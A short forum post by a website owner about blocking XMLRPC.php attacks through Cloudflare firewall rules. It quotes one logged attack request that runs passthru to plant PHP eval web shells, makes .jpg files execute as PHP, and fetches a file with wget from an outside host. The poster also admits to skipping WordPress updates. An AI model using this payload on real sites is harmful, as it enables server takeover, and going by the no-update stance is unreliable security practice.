Thank you for the answers and ideas! I will try them!
I just discovered a few these ago how cool, customizable is the Cloudflare firewall. Ihad thousands of daily XMLRPC.php attacks, however previously I blocked access to it in .htaccess, I think it’s still better to block this directly in the Cloudflare Firewall.
I also have attacks in my server log like these:
"POST /?q=user%2Fpassword&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup&name%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27 HTTP/1.1" 200 24584 "http://www.google.com.hk" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36"
Don’t know if it’s a possible vulnerable method for any Wordpress Installations, but I also blocked access to any queries like that.
A big problem is that I can’t upgrade Wordpress safely, because I have a highly customized theme and I also tweaked the files of the plugins, so I don’t wanna lose these modifications and I also don’t wanna risk a possible incompatibility with newer Wordpress versions.